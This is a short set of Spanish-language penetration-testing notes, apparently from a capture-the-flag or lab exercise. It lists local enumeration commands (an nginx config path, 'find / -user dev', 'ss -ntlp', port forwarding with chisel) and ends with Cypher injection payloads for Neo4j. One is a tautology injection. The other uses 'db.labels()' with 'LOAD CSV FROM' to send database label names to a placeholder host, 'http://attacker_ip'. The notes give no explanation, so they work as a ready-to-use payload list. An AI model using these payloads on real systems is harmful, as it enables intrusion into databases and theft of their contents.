Rutas de servicios web disponnibles:

/etc/nginx/sites-available/default

Buscamos usuarios:

find / -user dev

Vemos servicios corriendo local:

ss -ntlp

Exponerlos a nuestra maquina:

chisel

CYPHER:

MATCH (e.employee) WHERE e.name = ‘’ or 1=’1 RETURN e

' RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip /?l='+label as l RETURN 0 as _0